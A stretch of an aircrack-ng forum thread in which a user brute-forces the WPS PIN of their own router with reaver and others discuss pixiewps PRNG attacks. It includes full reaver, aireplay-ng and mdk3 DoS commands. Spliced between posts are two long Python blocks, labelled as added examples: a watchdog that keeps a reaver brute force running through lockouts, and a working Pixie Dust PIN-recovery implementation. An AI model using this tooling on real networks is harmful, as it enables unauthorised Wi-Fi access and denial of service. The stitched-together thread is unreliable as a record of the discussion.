Aircrack-ng forum

Topic: Is this a good place to ask for reaver help?

minimalis (Newbie, 1 post)
Is this a good place to ask for reaver help?
« on: September 07, 2016, 01:15:07 pm »

Hello aircrack-ng community,

I've recently been introduced to Kali Linux, which I intend to learn over the next few years.
(BTW, could anyone recommend a good book for a complete beginner, preferably one that can be bought in or converted to Kindle format? I am not really into online courses.)
Anyway, I figured I would test my router first, thinking practice makes perfect.
I will try to give you as much information as possible on the progress I've made.

I originally had MAC filtering enabled, so I had to disable that; I also decided to enable SSID broadcast for this penetration test, just to make things a bit easier.

Wireless adapter I'm using: TL-WN722N
Router in question: TL-WR720N

rockyou.txt and my personal wordlist couldn't find my passphrase, and my router is not Pixie Dust vulnerable. So far so good.

I figured I would try to brute-force the WPS PIN.

Terminal#1:
Code:
airmon-ng check kill    # kill NetworkManager/wpa_supplicant so they don't touch the card
airodump-ng wlan1       # scan for networks and find the router's BSSID and channel
I've read somewhere that "airodump-ng wlan1" is preferred over "airmon-ng wlan1; airodump-ng wlan1mon", because the former makes use of the whole card. I do not know if it makes any sense. I've tried both; the end result is the same.
When I find the BSSID of my router:
Code:
# {R_BSSID} is the router's BSSID and # its channel number
airodump-ng --bssid {R_BSSID} wlan1 -c #

New terminal window
Terminal#2:
Code:
wash -i wlan1    # list WPS-enabled APs and whether WPS is locked
I confirm that the router is in fact WPS enabled and is not locked.
Code:
aireplay-ng -1 0 -a {R_BSSID} wlan1    # fake authentication with the AP
I've read somewhere that this was supposed to fix my problem. It didn't, but I still do it just in case.

At this point I start reaver in Terminal#2:
Code:
# -d 3: 3 s delay between PIN attempts; -vv: very verbose; -w: mimic a Windows 7 registrar;
# -S: small DH keys; -N: don't send NACKs on out-of-order packets; -c #: the AP's channel
reaver -i wlan1 -b {R_BSSID} -d 3 -vv -w -S -N -c #
And it works. It starts cracking the PIN. No AP limiting. The process is fairly fast.
It gives an ETA of 8-10 hours.

That is, until ~15 minutes into the process, after which these start to appear:

Code:
[+] Sending M2 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code:0x02), re-trying last pin

Usually the warning comes after the M2 message, but not always: sometimes right after the EAPOL START request, sometimes after the M4 message.
Sometimes the next try succeeds, sometimes it gives an error 10 or more times in a row before it is able to advance to the next PIN.
The ETA goes up to 6 days!!!
Okay, I know 6 days isn't that much compared to brute-forcing a PSK directly, but compared to the earlier 10-ish hours it is a lot. And who knows, what if it gets even slower after a couple of hours?

I tried to restart my router from the terminal via:

Terminal#3
Code:
mdk3 wlan1 a -a {R_BSSID} -m    # authentication DoS against the AP, using valid client MACs
Output: AP seems invulnerable
Code:
mdk3 wlan1 a -i {R_BSSID} -m    # "intelligent" variant of the same test
Output: AP seems invulnerable
(I do have DDoS protection in my router.)

Restarting Kali Linux doesn't solve the problem.
Restarting the router seems to solve it, but manually restarting it doesn't really feel like a solution.

Has anyone ever come across a problem like this? Could anyone help me find a solution?

Thank you in advance.

(English is not my first language, so pardon any mistakes. I will try to rephrase if something I wrote is not understandable.)

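The stall described in the post (the AP stops answering after a while, retries pile up, and only a router reboot clears it) is something a wrapper around reaver can at least detect and react to instead of hammering the AP until the ETA reads six days. The block below is an added example, not code from the post or from the reaver project: it reads reaver's -vv output line by line, counts consecutive "WPS transaction failed ... re-trying last pin" lines since the last new PIN or the last answer from the AP, and returns a back-off verdict once a threshold is crossed; the process wrapper then kills reaver and pauses before re-running it. The sample log is constructed from the lines quoted in the post; the exact format of reaver's "Trying pin" line, and the assumption that a re-run reaver resumes its saved session when the restore prompt is answered with "y", are assumptions, not something the thread confirms.

```python
"""Watchdog for a reaver -vv run: stop hammering an AP that has gone silent.

Added example; not code from the thread or from the reaver project.
"""
import re
import subprocess
import sys
import time
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Patterns for the lines quoted in the thread.  The "Trying pin" format is an
# assumption about reaver's verbose output, so the regex is kept tolerant.
RE_TRYING = re.compile(r'Trying pin "?(\d{4,8})"?')
RE_FAILED = re.compile(r"WPS transaction failed \(code:0x[0-9a-fA-F]+\), re-trying last pin")
RE_PROGRESS = re.compile(r"Received (M\d message|WSC NACK)")   # the AP answered


@dataclass
class Stats:
    pins_attempted: int = 0        # "Trying pin" lines seen
    failures_total: int = 0        # failed transactions, any PIN
    consecutive_failures: int = 0  # failures since the last new PIN or AP answer
    worst_streak: int = 0
    stalled: bool = False          # streak reached the threshold


def feed(stats: Stats, line: str, threshold: int) -> Optional[str]:
    """Update stats with one output line; return "backoff" once the AP looks stalled."""
    if RE_TRYING.search(line):
        stats.pins_attempted += 1
        stats.consecutive_failures = 0
    elif RE_PROGRESS.search(line):
        stats.consecutive_failures = 0
    elif RE_FAILED.search(line):
        stats.failures_total += 1
        stats.consecutive_failures += 1
        stats.worst_streak = max(stats.worst_streak, stats.consecutive_failures)
        if stats.consecutive_failures >= threshold:
            stats.stalled = True
            return "backoff"
    return None


def analyse(lines: Iterable[str], threshold: int = 8) -> Stats:
    """Offline analysis of a captured log; stops at the first stall verdict."""
    stats = Stats()
    for line in lines:
        if feed(stats, line, threshold) == "backoff":
            break
    return stats


def run_with_backoff(cmd: List[str], threshold: int = 8, pause: int = 300,
                     max_restarts: int = 3) -> Stats:
    """Run reaver, watch its stdout, and on a stall kill it and pause before re-running.

    Assumption: a re-run against the same target resumes reaver's saved session;
    "y" is written to stdin in case reaver prompts to restore it.
    """
    stats = Stats()
    for _ in range(max_restarts + 1):
        proc = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                                stderr=subprocess.STDOUT, text=True)
        proc.stdin.write("y\n")
        proc.stdin.flush()
        stats = Stats()
        for line in proc.stdout:
            sys.stdout.write(line)
            if feed(stats, line, threshold) == "backoff":
                proc.terminate()
                proc.wait()
                break
        else:
            return stats            # reaver exited by itself (finished or killed externally)
        time.sleep(pause)           # give the AP time to recover before resuming
    return stats


def _constructed_attempt(pin: str, failures: int) -> List[str]:
    """Constructed reaver lines for one PIN: `failures` timeouts, then a normal NACK."""
    lines = [f'[+] Trying pin "{pin}"']
    for _ in range(failures):
        lines += ["[+] Sending M2 message",
                  "[!] WARNING: Receive timeout occurred",
                  "[+] Sending WSC NACK",
                  "[!] WPS transaction failed (code:0x02), re-trying last pin"]
    lines += ["[+] Sending M2 message", "[+] Received M3 message",
              "[+] Sending M4 message", "[+] Received WSC NACK"]
    return lines


# Constructed sample: a healthy PIN, a PIN with 3 retries, then a PIN the AP stops answering.
SAMPLE_LOG = (_constructed_attempt("12345670", 0)
              + _constructed_attempt("00005678", 3)
              + _constructed_attempt("00015677", 9))


if __name__ == "__main__":
    if len(sys.argv) > 1:           # e.g. python3 watchdog.py reaver -i wlan1 -b <bssid> -vv
        print(run_with_backoff(sys.argv[1:]))
    else:
        print(analyse(SAMPLE_LOG))
```

The threshold is the only tuning knob: the post reports "10 or more" retries in a row on a stalled AP, so 8 consecutive failures is a reasonable trigger, while a single timeout is just noise on a busy channel.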

Hosehead1 (Jr. Member, 50 posts)
Re: Is this a good place to ask for reaver help?
« Reply #1 on: October 18, 2016, 03:18:28 am »

Your TP-Link router is stalling responses to reaver after so many tries? I've seen this many times, but always against certain Netgear wifi routers: you can get maybe 700 or 1000 pins, but then it's all timeouts until the wifi router gets rebooted. And I have NO IDEA why... Is there some logfile inside the router that gets "full" and must be cleared before reaver may resume?
But re: this thread's title: I have an interesting reaver question about the old pixiewps --force option for brute-forcing the PRNG, so I also wonder if there's a correct place to inquire. Is there a pixiewps forum? Or a dedicated reaver forum?

kcdtv (Experienced, Full Member, 212 posts)
Re: Is this a good place to ask for reaver help?
« Reply #2 on: October 18, 2016, 11:05:54 am »

The Kali forum was the forum where pixiewps got developed,
and where the last versions of reaver with the pixiewps attack were developed too.
You can ask your question here or there; if it is not a purely code-related one I can answer you.

Hosehead1 (Jr. Member, 50 posts)
Re: Is this a good place to ask for reaver help?
« Reply #3 on: October 30, 2016, 10:27:17 pm »

Thanks kcdtv... I'm not on Kali just now, so I'll ask as best I can from memory. A bit over a year ago I'd run the -K -f options, and if pixiewps said "pin not found" it would proceed to attempt to brute-force the PRNG, taking maybe 30 minutes to an hour before finishing with 'pin not found'. Nowadays the -f switch no longer does "brute force PRNG"; now it means "force disable channel hopping".
Why was the brute-force PRNG attack removed? Granted, it never worked for me, but it felt good to keep trying. lol

kcdtv (Experienced, Full Member, 212 posts)
Re: Is this a good place to ask for reaver help?
« Reply #4 on: October 31, 2016, 03:05:50 pm »

Quote:
Why was the brute-force PRNG attack removed? Granted, it never worked for me, but it felt good to keep trying. lol

It is not removed.
What happens is that wiire automated it in the last version of pixiewps.
We have 3 cases:
  - Ralink chipset: no brute force of the PRNG is required, as the value of ES1 and ES2 is always 0. Cracking the hashes is immediate.
  - Broadcom chipset: brute force of the PRNG is trivial and immediate, because the seed used to randomize is very weak.
  - Last case: Realtek.
For the first two cases everything has been automatic since day one, as there is no entropy (Ralink) or a very weak one (Broadcom).
The last case (Realtek) is the one that can require a longer brute force:
  1) The seed used is the value in seconds at the time of the WPS exchange = no brute force.
  2) Or the time in seconds of the last firmware installation/activation = in this case a little brute force is needed.
A fact to know is that the Realtek devices permanently use, in every device, the same PKE:
Code:
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek

Pixiewps now detects that automatically.
If this PKE is found, it will automatically launch the brute force of the PRNG in case the PIN is not found straightforwardly (with the actual time as the value for the seed).
So the -f switch was changed, as it is not necessary any more to specify that you want the PRNG brute force.

Quote:
, it never worked for me but it felt good to keep trying. lol

I think that you can still try it, but you would have to copy-paste the stdout of reaver to grab the hashes and launch pixiewps with the brute-force option.
But it won't work for sure... This is just for Realtek devices from the "RTL819X project", the devices that are built using the Realtek SDK for these chipsets (rtl819something).
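All three cases kcdtv lists end in the same offline step once E-S1/E-S2 are known (or guessed from a seed): recompute E-Hash1/E-Hash2 for each PIN half and compare with what the AP sent in M3. The block below is an added example, not code from pixiewps, reaver or the thread. It implements that step as the WPS specification defines it (PSK1/PSK2 = first 128 bits of HMAC-SHA256(AuthKey, PIN half as ASCII); E-Hash = HMAC-SHA256(AuthKey, E-S || PSK || PKE || PKR)), takes the nonce candidates as an iterable so the Ralink case (both nonces zero) and a seed-search generator for the Realtek case plug in the same way, and includes the PIN checksum digit so the second half costs 10^3 guesses rather than 10^4. AuthKey, PKE and PKR are constructed stand-ins (in a real run reaver prints them from the M1-M3 exchange); the Realtek and Broadcom PRNGs themselves are not implemented here, so the caller supplies the candidate nonces.

```python
"""Offline WPS PIN recovery once E-S1/E-S2 are known (the Pixie Dust step).

Added example; not code from pixiewps, reaver or the thread.
"""
import hashlib
import hmac
from typing import Iterable, Iterator, Optional, Tuple

ZERO_NONCE = bytes(16)   # Ralink case from the thread: E-S1 = E-S2 = 0


def wps_checksum(pin7: int) -> int:
    """Check digit for a 7-digit PIN body (spec weights 3,1,3,1,3,1,3, most significant first)."""
    accum = 0
    while pin7:
        accum += 3 * (pin7 % 10)
        pin7 //= 10
        accum += pin7 % 10
        pin7 //= 10
    return (10 - accum % 10) % 10


def pin_valid(pin: str) -> bool:
    """True for an 8-digit PIN whose last digit is the checksum of the first seven."""
    return len(pin) == 8 and pin.isdigit() and wps_checksum(int(pin[:7])) == int(pin[7])


def psk_half(authkey: bytes, half: str) -> bytes:
    """PSK1 / PSK2: first 128 bits of HMAC-SHA256(AuthKey, PIN half as ASCII digits)."""
    return hmac.new(authkey, half.encode("ascii"), hashlib.sha256).digest()[:16]


def e_hash(authkey: bytes, es: bytes, psk: bytes, pke: bytes, pkr: bytes) -> bytes:
    """E-Hash1 / E-Hash2 = HMAC-SHA256(AuthKey, E-S || PSK || PKE || PKR)."""
    return hmac.new(authkey, es + psk + pke + pkr, hashlib.sha256).digest()


def enrollee_hashes(authkey: bytes, pke: bytes, pkr: bytes, pin: str,
                    es1: bytes, es2: bytes) -> Tuple[bytes, bytes]:
    """What the AP (enrollee) sends in M3 for its PIN and its two secret nonces."""
    return (e_hash(authkey, es1, psk_half(authkey, pin[:4]), pke, pkr),
            e_hash(authkey, es2, psk_half(authkey, pin[4:]), pke, pkr))


def _match(authkey: bytes, es: bytes, guesses: Iterable[str], target: bytes,
           pke: bytes, pkr: bytes) -> Optional[str]:
    """Return the first PIN half whose recomputed E-Hash equals `target`."""
    for guess in guesses:
        if hmac.compare_digest(e_hash(authkey, es, psk_half(authkey, guess), pke, pkr), target):
            return guess
    return None


def _second_halves(first: str) -> Iterator[str]:
    """The 1000 second halves whose 4th digit is the correct checksum for `first`."""
    for j in range(1_000):
        body = f"{first}{j:03d}"
        yield f"{j:03d}{wps_checksum(int(body))}"


def recover_pin(authkey: bytes, pke: bytes, pkr: bytes, ehash1: bytes, ehash2: bytes,
                candidates: Iterable[Tuple[bytes, bytes]]) -> Optional[str]:
    """Try each (E-S1, E-S2) candidate; a candidate that yields no first half is a wrong seed."""
    for es1, es2 in candidates:
        first = _match(authkey, es1, (f"{i:04d}" for i in range(10_000)), ehash1, pke, pkr)
        if first is None:
            continue
        second = _match(authkey, es2, _second_halves(first), ehash2, pke, pkr)
        if second is None:   # some APs don't enforce the checksum digit: fall back to 10^4
            second = _match(authkey, es2, (f"{j:04d}" for j in range(10_000)), ehash2, pke, pkr)
        if second is not None:
            return first + second
    return None


def constructed_inputs() -> Tuple[bytes, bytes, bytes]:
    """Constructed stand-ins for AuthKey, PKE and PKR (reaver prints the real ones)."""
    authkey = hashlib.sha256(b"constructed authkey").digest()                  # 32 bytes
    pke = hashlib.sha256(b"constructed enrollee DH pubkey").digest() * 6       # 192 bytes
    pkr = hashlib.sha256(b"constructed registrar DH pubkey").digest() * 6      # 192 bytes
    return authkey, pke, pkr


def demo(pin: str = "12345670", candidates=None) -> Optional[str]:
    """Simulate a Ralink-style AP (zero nonces) and recover its PIN from the M3 hashes alone."""
    authkey, pke, pkr = constructed_inputs()
    eh1, eh2 = enrollee_hashes(authkey, pke, pkr, pin, ZERO_NONCE, ZERO_NONCE)
    if candidates is None:   # a wrong guess first, to show that a bad seed is skipped
        candidates = [(b"\x01" * 16, b"\x02" * 16), (ZERO_NONCE, ZERO_NONCE)]
    return recover_pin(authkey, pke, pkr, eh1, eh2, candidates)


if __name__ == "__main__":
    print(demo())
```

The cost per nonce candidate is at most 10^4 + 10^3 HMACs (plus a 10^4 fallback for APs that ignore the checksum), which is why a Realtek seed search over a window of seconds is still cheap, and why the registrar-side (reaver) cost of roughly 11,000 online attempts is what the Pixie Dust step removes.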